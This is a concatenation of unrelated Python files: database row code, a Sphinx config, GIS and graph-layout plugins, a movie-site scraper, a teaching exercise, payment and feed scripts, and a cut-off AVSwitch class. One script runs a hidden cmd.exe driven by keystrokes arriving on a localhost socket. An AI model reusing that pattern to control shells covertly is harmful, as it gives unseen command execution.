		# union abstractions, then django-style "a__b" relation queries.
		if attr in self.structure:
			return self._get_value(attr)

		if attr in self.structure._abstractions: # Union abstractions etc
			field, func = self.structure._abstractions[attr]
			return func(field, self)

		if "__" in attr:
			return self._query(attr)

		return super(DBRow, self).__getattribute__(attr)

	def __int__(self):
		return self.id

	def __setattr__(self, attr, value):
		# Do not preserve the value in DBRow! Use the save method to save.
		if self.initialized and attr in self.structure:
			self._set_value(attr, value)
		return super(DBRow, self).__setattr__(attr, value)

	def __setitem__(self, index, value):
		if not isinstance(index, int):
			raise TypeError("Expected int instance, got %s instead (%r)" % (type(index), index))
		list.__setitem__(self, index, value)
		# Keep the converted (python-side) value cache in sync
		col = self.structure[index]
		self._values[col.name] = col.to_python(value, row=self)


	def _get_reverse_relation(self, table, field):
		"""
		Return a list of rows matching the reverse relation
		"""
		# Cache maps "table__field" -> {foreign id -> [rows]}; built once per table/field
		if not hasattr(self._parent, "_reverse_relation_cache"):
			self._parent._reverse_relation_cache = {}
		cache = self._parent._reverse_relation_cache

		tfield = table + "__" + field
		if tfield not in cache:
			cache[tfield] = {}
			# First time lookup, let's build the cache
			table = self._parent.environment.dbFile(table)
			for row in table:
				row = table[row]
				id = row._raw(field)
				if id not in cache[tfield]:
					cache[tfield][id] = []
				cache[tfield][id].append(row)

		return cache[tfield].get(self.id, None)

	def _matches(self, **kwargs):
		"""Return True when every kwarg relation query matches this row."""
		for k, v in kwargs.items():
			if not self._query(k, v):
				return False
		return True

	def _query(self, rel, value=None):
		"""
		Parse a django-like multilevel relationship
		"""
		rels = rel.split("__")
		if "" in rels: # empty string
			raise ValueError("Invalid relation string")

		first = rels[0]
		if not hasattr(self, first):
			if self._parent.environment.hasDbFile(first):
				# Handle reverse relations, eg spell__item for item table
				remainder = rel[len(first + "__"):]
				return self._get_reverse_relation(first, remainder)

			raise ValueError("Invalid relation string")

		ret = self
		rels = rels[::-1]

		# Comparison operators allowed as the final path component
		special = {
			"contains": lambda x, y: x in y,
			"exact": lambda x, y: x == y,
			"icontains": lambda x, y: x.lower() in y.lower(),
			"iexact": lambda x, y: x.lower() == y.lower(),
			"gt": lambda x, y: x > y,
			"gte": lambda x, y: x >= y,
			"lt": lambda x, y: x < y,
			"lte": lambda x, y: x <= y,
		}

		while rels:
			if rels[-1] in special:
				if len(rels) != 1:
					# icontains always needs to be the last piece of the relation string
					raise ValueError("Invalid relation string")

				return special[rels[-1]](value, ret)
			else:
				ret = getattr(ret, rels.pop())

		return ret

	def _set_value(self, name, value):
		"""Set column `name` from a raw value, caching its converted form."""
		index = self.structure.index(name)
		col = self.structure[index]
		self._values[name] = col.to_python(value, self)
		self[index] = value

	def _get_value(self, name):
		"""Return the converted value of column `name`, converting lazily."""
		if name not in self._values:
			raw_value = self[self.structure.index(name)]

			self._set_value(name, raw_value)

		return self._values[name]

	def _raw(self, name):
		"""
		Returns the raw value from field 'name'
		"""
		index = self.structure.index(name)
		return self[index]

	def _save(self):
		"""Write the cached python values back into the raw list entries."""
		for name in self._values:
			index = self.structure.index(name)
			col = self.structure[index]
			self[index] = col.from_python(self._values[name])

	def _field(self, name):
		"""
		Returns the field 'name'
		"""
		index = self.structure.index(name)
		return self.structure[index]

	def _default(self):
		"""
		Change all fields to their default values
		"""
		del self[:]
		self._values = {}
		for col in self.structure:
			char = col.char
			if col.dyn:
				self.append(None)
			elif char == "s":
				self.append("")
			elif char == "f":
				self.append(0.0)
			else:
				self.append(0)


	def dict(self):
		"""
		Return a dict of the row as colname: value
		"""
		return dict(zip(self.structure.column_names, self))

	def update(self, other):
		"""Update columns from `other`, a mapping of column index -> value."""
		for k in other:
			self[k] = other[k]

	@property
	def id(self):
		"Temporary hack to transition between _id and id"
		return self._id

# -*- coding: utf-8 -*-
#
# Phaser Editor documentation build configuration file, created by
# sphinx-quickstart on Thu May 25 08:35:14 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.

# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))


# -- General configuration ------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
# Sphinx extension modules (none enabled; rinoh left here as a reminder).
extensions = [
    #'rinoh.frontend.sphinx'
]

# Directory containing page templates, relative to this file.
templates_path = ['_templates']

# Source files are reStructuredText only.
source_suffix = '.rst'

# Document holding the root toctree.
master_doc = 'index'

# Project identity.
project = u'Phaser Editor 2D'
copyright = u'2016-2020, Arian Fornaris'
author = u'Arian Fornaris'

# Short X.Y version and full release string (kept identical here).
version = u'2.1.7'
release = u'2.1.7'

# Language for autogenerated content (None = Sphinx default).
language = None

# Files and directories ignored when collecting sources; this also
# applies to html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']

# Pygments highlighting style is left at the Sphinx default.
# pygments_style = 'sphinx'

# Do not render `todo` / `todoList` directives.
todo_include_todos = False


# -- Options for HTML output ----------------------------------------------



# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.
#
#import sphinx_rtd_theme

# Custom theme shipped in the _themes directory.
html_theme = "phaser-editor"

# Uncomment for generate Eclipse Offline Help
#html_theme = "eclipse-help"

html_theme_path = ["_themes"]
html_show_sourcelink = False
html_show_sphinx = False
html_favicon = "logo.png"
html_title = "Phaser Editor Help"
html_show_copyright = True

# (A leftover debug `print(html_theme_path)` statement was removed here.)

#html_theme = 'classic'
highlight_language = 'javascript'

# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}

# Paths with custom static files (style sheets etc.), relative to this
# directory; they are copied after the builtin static files, so a file
# named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']


# -- Options for HTMLHelp output ------------------------------------------

# Output file base name for HTML help builder.
# Base name for the HTML help builder output.
htmlhelp_basename = 'PhaserEditordoc'


# -- Options for LaTeX output ---------------------------------------------

latex_elements = {
    # Paper size ('letterpaper' or 'a4paper').
    'papersize': 'letterpaper',

    # Base font size ('10pt', '11pt' or '12pt').
    'pointsize': '10pt',

    # Extra LaTeX preamble.
    'preamble': '',

    # Figure (float) alignment.
    'figure_align': 'htbp',
}

# One tuple per LaTeX document:
# (source start file, target name, title, author, documentclass).
latex_documents = [
    (master_doc, 'PhaserEditor2D.tex', u'Phaser Editor 2D Documentation',
     u'Arian Fornaris', 'manual'),
]


# -- Options for Texinfo output -------------------------------------------

# One tuple per Texinfo document:
# (source start file, target name, title, author,
#  dir menu entry, description, category).
texinfo_documents = [
    (master_doc, 'PhaserEditor2D', u'Phaser Editor 2D Documentation',
     author, 'Arian', 'A friendly HTML5 game IDE.',
     'Miscellaneous'),
]




# -*- coding: utf-8 -*-

"""
***************************************************************************
    SplitRGBBands.py
    ---------------------
    Date                 : August 2012
    Copyright            : (C) 2012 by Victor Olaya
    Email                : volayaf at gmail dot com
***************************************************************************
*                                                                         *
*   This program is free software; you can redistribute it and/or modify  *
*   it under the terms of the GNU General Public License as published by  *
*   the Free Software Foundation; either version 2 of the License, or     *
*   (at your option) any later version.                                   *
*                                                                         *
***************************************************************************
"""
from processing.tools.system import *
from processing.tools import dataobjects
from processing.saga.SagaUtils import SagaUtils

__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'

from PyQt4 import QtGui
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.parameters.ParameterRaster import ParameterRaster
from processing.outputs.OutputRaster import OutputRaster
import os

class SplitRGBBands(GeoAlgorithm):
    """SAGA-based processing algorithm that splits an RGB raster layer
    into three single-band rasters (R, G and B)."""

    INPUT = "INPUT"
    R = "R"
    G = "G"
    B = "B"

    def getIcon(self):
        """Return the SAGA icon displayed next to the algorithm."""
        return QtGui.QIcon(os.path.dirname(__file__) + "/../images/saga.png")

    def defineCharacteristics(self):
        """Declare the algorithm name, group, raster input and the three
        single-band raster outputs."""
        self.name = "Split RGB bands"
        self.group = "Grid - Tools"
        self.addParameter(ParameterRaster(SplitRGBBands.INPUT, "Input layer", False))
        self.addOutput(OutputRaster(SplitRGBBands.R, "Output R band layer"))
        self.addOutput(OutputRaster(SplitRGBBands.G, "Output G band layer"))
        self.addOutput(OutputRaster(SplitRGBBands.B, "Output B band layer"))

    def processAlgorithm(self, progress):
        """Build and run the SAGA io_gdal commands that import the RGB
        raster and export each band separately."""
        # TODO: check correct num of bands
        # Renamed from `input`, which shadowed the builtin.
        inputLayer = self.getParameterValue(SplitRGBBands.INPUT)

        # SAGA is picky about temp file names, so strip dots and any
        # non-alphanumeric characters from the basename.
        temp = getTempFilename(None).replace('.', '')
        basename = os.path.basename(temp)
        validChars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
        safeBasename = ''.join(c for c in basename if c in validChars)
        temp = os.path.join(os.path.dirname(temp), safeBasename)

        r = self.getOutputValue(SplitRGBBands.R)
        g = self.getOutputValue(SplitRGBBands.G)
        b = self.getOutputValue(SplitRGBBands.B)

        # Only the SAGA library prefix differs between platforms; the
        # generated command strings are otherwise identical.
        lib = "io_gdal" if isWindows() else "libio_gdal"
        commands = [
            lib + " 0 -GRIDS \"" + temp + "\" -FILES \"" + inputLayer + "\"",
            lib + " 1 -GRIDS \"" + temp + "_0001.sgrd\" -FORMAT 1 -TYPE 0 -FILE \"" + r + "\"",
            lib + " 1 -GRIDS \"" + temp + "_0002.sgrd\" -FORMAT 1 -TYPE 0 -FILE \"" + g + "\"",
            lib + " 1 -GRIDS \"" + temp + "_0003.sgrd\" -FORMAT 1 -TYPE 0 -FILE \"" + b + "\"",
        ]

        SagaUtils.createSagaBatchJobFileFromSagaCommands(commands)
        SagaUtils.executeSaga(progress)

#!/usr/bin/python2.3

# This is the short name of the plugin, used as the menu item
# for the plugin.
# If not specified, the name of the file will be used.
shortname = "Moment Curve layout (Cohen et al. 1995)"
# This is the long name of the plugin, used as the menu note
# for the plugin.
# If not specified, the short name will be used.
name = "Moment Curve layout, O(n^3)"

DEBUG = False


def run(context, UI):
    """
    Run this plugin.

    Either reuses the current graph (stripping bend points) or generates a
    complete graph of a user-chosen size, then applies the moment curve
    layout and points the camera at the result. Returns True.

    Fix: `N == None` comparisons replaced with the idiomatic `N is None`.
    """

    if len(context.graph.vertices) < 1:
        generate = True
    else:
        res = UI.prYesNo("Use current graph?",
                         "Would you like to apply the layout to the current graph? If not, a complete graph will be generated and the current graph cleared.")
        if res:
            generate = False
            # Go through and eliminate any existing bend points
            from graph import DummyVertex

            for v in [x for x in context.graph.vertices if isinstance(x, DummyVertex)]:
                context.graph.removeVertex(v)
        else:
            generate = True

    if generate:
        N = UI.prType("Number of Vertices", "Input number of vertices to generate complete graph:", int, 4)
        if N is None:  # user cancelled the prompt
            return True
        while N < 0:
            N = UI.prType("Number of Vertices",
                          "Please input positive value.\n\nInput number of vertices to generate complete graph:", int,
                          N)
            if N is None:
                return True

        context.graph.clear()

        # Generate a complete graph
        k_n(context, N)

    res = UI.prYesNo("Use mod-p layout?",
                     "Would you like to use the mod-p compact layout (O(n^3) volume)? If not, the O(n^6) uncompacted layout will be used.")

    # Lay it out according to the moment curve layout
    moment(context, compact=res)

    context.camera.lookAtGraph(context.graph, context.graph.centerOfMass(), offset=context.graph.viewpoint())

    return True


def k_n(C, n):
    """
    k_n (C, n) -> void
    Create a complete graph on n vertices in context C.
    """
    from graph import Vertex, DummyVertex

    G = C.graph
    G.clear()

    # Create the n vertices first
    for index in range(n):
        G.addVertex(Vertex(id='%d' % index, name='v%d' % index))

    # Then connect every unordered pair of distinct vertices exactly once
    for u in G.vertices:
        for v in G.vertices:
            if u != v and (u, v) not in G.edges and (v, u) not in G.edges:
                G.addEdge((u, v))


def moment(C, compact=False):
    """
    Run moment curve layout (Cohen, Eades, Lin, Ruskey 1995).

    Places vertex i at (i, i^2, i^3); with compact=True, coordinates are
    reduced mod a prime p with n < p <= 2n and scaled by 10, giving the
    O(n^3)-volume layout instead of the O(n^6) one.
    """
    # (Removed unused imports: math.sqrt/ceil/floor, colorsys, GraphError.)
    from graph import DummyVertex

    G = C.graph

    # Only lay out real vertices; dummy (bend-point) vertices are skipped.
    vertices = [x for x in G.vertices if not isinstance(x, DummyVertex)]
    n = len(vertices)

    # Choose a prime p with n < p <= 2n (Bertrand's postulate guarantees one).
    for p in range(n + 1, 2 * n + 1):
        # Trial division; the upper bound must INCLUDE p//2, otherwise p=4
        # has an empty divisor range and is misclassified as prime.
        # '//' keeps integer division correct on both Python 2 and 3.
        for div in range(2, p // 2 + 1):
            if p % div == 0:
                # p is composite (divisible by div)
                break
        else:
            # We did not find a divisor: p is prime.
            break
    else:
        # Unreachable for n >= 1 by Bertrand's postulate; fail loudly anyway.
        raise Exception("Can't find a prime between %d and %d!" % (n + 1, 2 * n))

    # Position each vertex on the (mod-p) moment curve.
    if compact:
        for i in range(n):
            G.modVertex(vertices[i]).pos = (i * 10, ((i * i) % p) * 10, ((i * i * i) % p) * 10)
    else:
        for i in range(n):
            G.modVertex(vertices[i]).pos = (i, (i * i), (i * i * i))

    return

# -*- coding: utf-8 -*-

#  ..#######.########.#######.##....#..######..######.########....###...########.#######.########..######.
#  .##.....#.##.....#.##......###...#.##....#.##....#.##.....#...##.##..##.....#.##......##.....#.##....##
#  .##.....#.##.....#.##......####..#.##......##......##.....#..##...##.##.....#.##......##.....#.##......
#  .##.....#.########.######..##.##.#..######.##......########.##.....#.########.######..########..######.
#  .##.....#.##.......##......##..###.......#.##......##...##..########.##.......##......##...##........##
#  .##.....#.##.......##......##...##.##....#.##....#.##....##.##.....#.##.......##......##....##.##....##
#  ..#######.##.......#######.##....#..######..######.##.....#.##.....#.##.......#######.##.....#..######.

'''
    OpenScrapers Project
    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.
'''

import re

from openscrapers.modules import cleantitle, source_utils, cfscrape


class source:
    """Scraper source for coolmoviezone.online.

    Follows the OpenScrapers provider interface: movie() builds a page URL,
    sources() extracts hoster links from that page, resolve() is a no-op.
    """

    def __init__(self):
        self.priority = 1
        self.language = ['en']
        self.domains = ['coolmoviezone.online']
        self.base_link = 'https://coolmoviezone.online'
        self.scraper = cfscrape.create_scraper()

    def movie(self, imdb, title, localtitle, aliases, year):
        """Return the site URL for a movie, or None on any failure.

        Callers treat None as "not found", so errors are deliberately
        swallowed — but catch Exception rather than a bare except, which
        would also trap SystemExit/KeyboardInterrupt.
        """
        try:
            title = cleantitle.geturl(title)
            url = self.base_link + '/%s-%s' % (title, year)
            return url
        except Exception:
            return

    def sources(self, url, hostDict, hostprDict):
        """Scrape hoster links from the movie page.

        Returns a list of source dicts, or None if scraping failed
        (NOTE(review): callers may expect [] on failure — confirm).
        """
        try:
            sources = []
            r = self.scraper.get(url).content
            match = re.compile('<td align="center"><strong><a href="(.+?)"').findall(r)
            for url in match:
                # Derive a display name from the hoster's domain,
                # e.g. 'https://www.example.com/x' -> 'Example'.
                host = url.split('//')[1].replace('www.', '')
                host = host.split('/')[0].split('.')[0].title()
                quality = source_utils.check_sd_url(url)
                sources.append({'source': host, 'quality': quality, 'language': 'en', 'url': url, 'direct': False,
                                'debridonly': False})
        except Exception:
            return
        return sources

    def resolve(self, url):
        """Links need no further resolution on this site."""
        return url

'''
Ohm's law is a simple equation describing electrical circuits. It
states that the voltage V through a resistor is equal to the current
(I) times the resistance:

V = I * R

The units of these are volts, ampheres (or "amps"), and ohms,
respectively. In real circuits, often R is actually measured in
kiloohms (10**3 ohms) and I in milliamps (10**-3 amps).

Let's create a Resistor class that models this behavior. The
constructor takes two arguments - the resistance in ohms, and the
voltage in volts:

>>> resistor = Resistor(800, 5.5)
>>> resistor.resistance
800
>>> resistor.voltage
5.5

The current is derived from these two using Ohm's law:
(Hint: use @property)

>>> resistor.current
0.006875

Since we may want the value in milliamps, let's make another property
to provide that:

>>> resistor.current_in_milliamps
6.875

Let's set it up so that we can change the current, and doing so will
correspondingly modify the voltage (but keep the resistance constant).

>>> resistor.current_in_milliamps = 3.5
>>> resistor.resistance
800
>>> round(resistor.voltage, 2)
2.8
>>> resistor.current = .006875
>>> round(resistor.voltage, 2)
5.5
>>> resistor.resistance
800

Also, we've made a design decision that a Resistor cannot change its
resistance value once created:

>>> resistor.resistance = 8200
Traceback (most recent call last):
AttributeError: can't set attribute

'''

# Write your code here:

class Resistor:
    """A resistor obeying Ohm's law: V = I * R.

    Resistance (ohms) is fixed at construction time and read-only;
    voltage (volts) is mutable. Current is derived, and assigning to it
    (in amps or milliamps) adjusts the voltage instead.
    """

    def __init__(self, resistance, voltage):
        self._resistance = resistance
        self.voltage = voltage

    @property
    def resistance(self):
        """Resistance in ohms; no setter, so assignment raises AttributeError."""
        return self._resistance

    @property
    def current(self):
        """Current in amps, via Ohm's law (I = V / R)."""
        return self.voltage / self._resistance

    @current.setter
    def current(self, amps):
        # Keep R fixed; changing I therefore changes V.
        self.voltage = amps * self._resistance

    @property
    def current_in_milliamps(self):
        """Current expressed in milliamps (1 A = 1000 mA)."""
        return 1000 * self.current

    @current_in_milliamps.setter
    def current_in_milliamps(self, milliamps):
        self.current = milliamps / 1000

# Do not edit any code below this line!

if __name__ == '__main__':
    import doctest
    # testmod() returns (failed, attempted); despite its name, `count`
    # holds the number of FAILED doctests, so 0 means everything passed.
    count, _ = doctest.testmod()
    if count == 0:
        print('*** ALL TESTS PASS ***\nGive someone a HIGH FIVE!')

# Copyright 2015-2018 Aaron Maxwell. All rights reserved.

# coding=utf-8
# ---------------------------------------------------------------
# Desenvolvedor:    Arannã Sousa Santos
# Mês:              12
# Ano:              2015
# Projeto:          pagseguro_xml
# e-mail:           asousas@live.com
# ---------------------------------------------------------------

import logging
from pagseguro_xml.notificacao import ApiPagSeguroNotificacao_v3, CONST_v3


logger = logging.basicConfig(level=logging.DEBUG)


PAGSEGURO_API_AMBIENTE = u'sandbox'
PAGSEGURO_API_EMAIL = u'seu@email.com'
PAGSEGURO_API_TOKEN_PRODUCAO = u''
PAGSEGURO_API_TOKEN_SANDBOX = u''


CHAVE_NOTIFICACAO = u'AA0000-AA00A0A0AA00-AA00AA000000-AA0000'      # ela éh de producao


api = ApiPagSeguroNotificacao_v3(ambiente=CONST_v3.AMBIENTE.SANDBOX)
PAGSEGURO_API_TOKEN = PAGSEGURO_API_TOKEN_PRODUCAO


ok, retorno = api.consulta_notificacao_transacao_v3(PAGSEGURO_API_EMAIL, PAGSEGURO_API_TOKEN, CHAVE_NOTIFICACAO)

if ok:

    print u'-' * 50
    print retorno.xml
    print u'-' * 50

    for a in retorno.alertas:
        print a

else:
    print u'Motivo do erro:', retorno


#
#
# (C) Copyright 2001 The Internet (Aust) Pty Ltd
# ACN: 082 081 472  ABN: 83 082 081 472
# All Rights Reserved
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
# Author: Andrew Milton <akm@theinternet.com.au>
# $Id: Plugins.py,v 1.5 2004/11/10 14:15:33 akm Exp $

import App, Globals, OFS
import string
import time

from Globals import ImageFile, HTMLFile, HTML, MessageDialog, package_home
from OFS.Folder import Folder

class PluginRegister:
    """Record describing a registered plugin and its Zope management hooks.

    Bundles the plugin class together with the add/edit forms and methods
    that the management UI dispatches to.
    """

    def __init__(self, name, description, pluginClass,
                 pluginStartForm, pluginStartMethod,
                 pluginEditForm=None, pluginEditMethod=None):
        # Plugin identifier; must not contain spaces.
        self.name = name
        self.description = description
        self.plugin = pluginClass
        self.manage_addForm = pluginStartForm
        self.manage_addMethod = pluginStartMethod
        self.manage_editForm = pluginEditForm
        self.manage_editMethod = pluginEditMethod

class CryptoPluginRegister:
    """Record describing a registered crypto plugin.

    Pairs a named crypto method with the plugin method that applies it.
    """

    def __init__(self, name, crypto, description, pluginMethod):
        # Plugin identifier; must not contain spaces.
        self.name = name
        self.cryptoMethod = crypto
        self.description = description
        self.plugin = pluginMethod

#!/usr/bin/python
"feed fetcher"

from db import MySQLDatabase
from fetcher import FeedFetcher

def main():
    db = MySQLDatabase()
    fetcher = FeedFetcher()

    feeds = db.get_feeds(offset=0, limit=10)
    read_count = 10
    while len(feeds) > 0:
        for feed in feeds:
            fid = feed[0]
            url = feed[1]
            title = feed[2]
            print "fetching #{0}: {1}".format(fid, url)
            entries = fetcher.fetch(url)
            for entry in entries:
                entry.feed_id = fid
                try:
                    print "insert {0}".format(entry.url)
                except UnicodeEncodeError:
                    print "insert {0}".format(entry.url.encode('utf-8'))
                db.append_feed_content(entry)
        feeds = db.get_feeds(offset=read_count, limit=10)
        read_count += 10

if __name__ == '__main__':
    # Run the fetcher only when executed as a script, not on import.
    main()

# Print the even numbers from 0 through 10 (inclusive).
for number in range(0, 11, 2):
    print(number)
#!/usr/bin/env python

import math


# Convert tab-separated (diameter, energy-per-length) samples into an
# estimated contact density at the rod surface, written as (radius, n_contact).
# `with` guarantees both files are closed even if a parse error occurs.
with open('figs/single-rod-in-water.dat', 'r') as fin, \
        open('figs/single-rods-calculated-density.dat', 'w') as fout:

    kB = 3.16681539628059e-6 # This is Boltzmann's constant in Hartree/Kelvin
    first = True
    nm = 18.8972613  # bohr radii per nanometer

    for line in fin:
        pieces = line.split('\t')
        if first:
            # First sample just seeds the (r2, E2) state.
            r2 = float(pieces[0])/2*nm
            E2 = float(pieces[1])
            first = False
        else:
            # Only take a finite-difference step once the radius has moved
            # far enough (> 0.25 bohr) for a stable derivative.
            if ((float(pieces[0])/2*nm - r2) > 0.25):
                r1 = r2
                r2 = float(pieces[0])/2*nm
                E1 = E2
                E2 = float(pieces[1]) # actually it's energy per unit length!
                length = 1 # arbitrary
                r = (r1 + r2)/2
                # dE/dR approximates the radial force on the rod surface.
                dEdR = (E2-E1)/(r2-r1)*length
                area = 2*math.pi*r*length
                force = dEdR
                pressure = force/area
                kT = kB*298 # about this
                ncontact = pressure/kT
                fout.write(str(r)+'\t'+str(ncontact)+'\n')

import win32pipe
import win32console
import win32process
import time
import win32con
import codecs
import ctypes 
user32 = ctypes.windll.user32

# Maps received key codes (stringified character ordinals) to Windows
# virtual-key constants, for synthesizing console key-press events.
CONQUE_WINDOWS_VK = {
    '3'  : win32con.VK_CANCEL,
    '8'  : win32con.VK_BACK,
    '9'  : win32con.VK_TAB,
    '12' : win32con.VK_CLEAR,
    '13' : win32con.VK_RETURN,
    '17' : win32con.VK_CONTROL,
    '20' : win32con.VK_CAPITAL,
    '27' : win32con.VK_ESCAPE,
    '28' : win32con.VK_CONVERT,
    '35' : win32con.VK_END,
    '36' : win32con.VK_HOME,
    '37' : win32con.VK_LEFT,
    '38' : win32con.VK_UP,
    '39' : win32con.VK_RIGHT,
    '40' : win32con.VK_DOWN,
    '45' : win32con.VK_INSERT,
    '46' : win32con.VK_DELETE,
    '47' : win32con.VK_HELP
}

def make_input_key(c, control_key_state=None):
    """Build a key-down PyINPUT_RECORDType for the single character *c*.

    Ctrl-C (ordinal 3) is handled specially: a CTRL_C_EVENT is generated
    for the console and None is returned instead of a key record.
    `control_key_state` is accepted but currently unused.
    """
    code = ord(c)

    if code == 3:
        # Deliver Ctrl-C as a console control event, not a key press.
        win32console.GetConsoleProcessList()
        win32console.GenerateConsoleCtrlEvent(win32con.CTRL_C_EVENT, 0)
        return

    record = win32console.PyINPUT_RECORDType(win32console.KEY_EVENT)
    record.KeyDown = True
    record.RepeatCount = 1
    record.Char = unicode(c)
    key = str(code)
    if key in CONQUE_WINDOWS_VK:
        record.VirtualKeyCode = CONQUE_WINDOWS_VK[key]
    else:
        # Fall back to asking Windows for the virtual-key code.
        record.VirtualKeyCode = ctypes.windll.user32.VkKeyScanA(code)

    return record


#win32console.AttachConsole()
coord = win32console.PyCOORDType

# Handles to the current console's input and output buffers.
con_stdout = win32console.GetStdHandle(win32console.STD_OUTPUT_HANDLE)
con_stdin = win32console.GetStdHandle(win32console.STD_INPUT_HANDLE)

# Spawn a cmd.exe child with its window hidden (STARTF_USESHOWWINDOW with
# wShowWindow left at its default).
flags = win32process.NORMAL_PRIORITY_CLASS
si = win32process.STARTUPINFO()
si.dwFlags |= win32con.STARTF_USESHOWWINDOW

(handle1, handle2, i1, i2) = win32process.CreateProcess(None, "cmd.exe", None, None, 0, flags, None, '.', si)
# Give the child console a moment to initialize before we start feeding input.
time.sleep(1)
#size = con_stdout.GetConsoleScreenBufferInfo()['Window']
# with codecs.open("log.txt", "w", "utf8") as f:
	# for i in xrange(0, size.Bottom):
		# f.write(con_stdout.ReadConsoleOutputCharacter(size.Right+1, coord(0, i)))
		# f.write("\n")

import socket

# Accept a single local TCP client and forward each received byte to the
# hidden console as a synthesized key event.  A NUL byte ends the session.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
HOST = "127.0.0.1"
PORT = 5554

s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(1)

(sc, scname) = s.accept()
while True:
    msg = sc.recv(1)
    # recv() returns an empty string when the peer disconnects; the old
    # code called ord('') on it and crashed.  Treat disconnect like NUL.
    if not msg or ord(msg) == 0:
        break
    key = make_input_key(msg)
    # make_input_key returns None for Ctrl-C (delivered as a console
    # control event); the old `if keys:` test on a one-element list was
    # always true and passed [None] to WriteConsoleInput.
    if key is not None:
        con_stdin.WriteConsoleInput([key])


win32process.TerminateProcess(handle1, 0)
import urllib2
import appuifw, e32
from key_codes import *


class Drinker(object):
    """Plain data holder for one drinker record fetched from the server."""

    def __init__(self):
        # Defaults represent an empty/unknown record.
        self.id = 0       # database id
        self.name = ""
        self.prom = 0.0   # presumably blood-alcohol (promille) — TODO confirm
        self.idle = ""    # idle-time string from the server
        self.drinks = 0   # total drinks counted


def get_drinker_list():
    """Download and parse the drinker list from the server.

    Each non-empty response line is '|'-separated: id|name|drinks|prom|idle.
    Returns a list of Drinker objects.
    """
    raw = urllib2.urlopen("http://192.168.11.5:8080/drinkcounter/get_datas/").read().split("\n")

    drinkers = []
    for row in raw:
        if row == '':
            continue

        parts = row.split('|')

        d = Drinker()
        d.id = int(parts[0])
        d.name = parts[1]
        d.drinks = int(parts[2])
        d.prom = float(parts[3])
        d.idle = parts[4]
        drinkers.append(d)

    return drinkers


def get_listbox_items(drinkers):
    """Format each drinker as a unicode label for the listbox widget."""
    return [unicode('%s, %d drinks, %s' % (d.name, d.drinks, d.idle))
            for d in drinkers]


# "Alkoholilaskuri" is Finnish for "alcohol counter".
appuifw.app.title = u"Alkoholilaskuri"

# Active-object lock that keeps the app alive until quit() signals it.
app_lock = e32.Ao_lock()

#Define the exit function 
# NOTE(review): `quit` shadows the builtin; harmless here since it is only
# installed as the exit-key handler.
def quit():
        app_lock.signal()

appuifw.app.exit_key_handler = quit

# Initial data load for the listbox.
drinkers = get_drinker_list()
items = get_listbox_items(drinkers)

#Define a function that is called when an item is selected
def handle_selection():
    selected_drinker = drinkers[lb.current()]
    urllib2.urlopen("http://192.168.11.5:8080/drinkcounter/add_drink/%d/" % (selected_drinker.id))
    appuifw.note(u"A drink has been added to " + drinkers[lb.current()].name, 'info')

    new_drinkers = get_drinker_list()
    items = get_listbox_items(new_drinkers)

    lb.set_list(items, lb.current())


#Create an instance of Listbox and set it as the application's body
lb = appuifw.Listbox(items, handle_selection)
appuifw.app.body = lb

# Block here until quit() signals the lock (exit key pressed).
app_lock.wait()

from config import config, ConfigSlider, ConfigSelection, ConfigYesNo, \
	ConfigEnableDisable, ConfigSubsection, ConfigBoolean, ConfigSelectionNumber, ConfigNothing, NoSave
from enigma import eAVSwitch, getDesktop
from SystemInfo import SystemInfo
from os import path as os_path

class AVSwitch:
	"""Thin wrapper around the eAVSwitch driver singleton.

	Translates the string values stored in config.av.* into the numeric
	codes the driver expects.
	"""

	def setInput(self, input):
		"""Select the video input: "ENCODER", "SCART" or "AUX"."""
		INPUT = { "ENCODER": 0, "SCART": 1, "AUX": 2 }
		eAVSwitch.getInstance().setInput(INPUT[input])

	def setColorFormat(self, value):
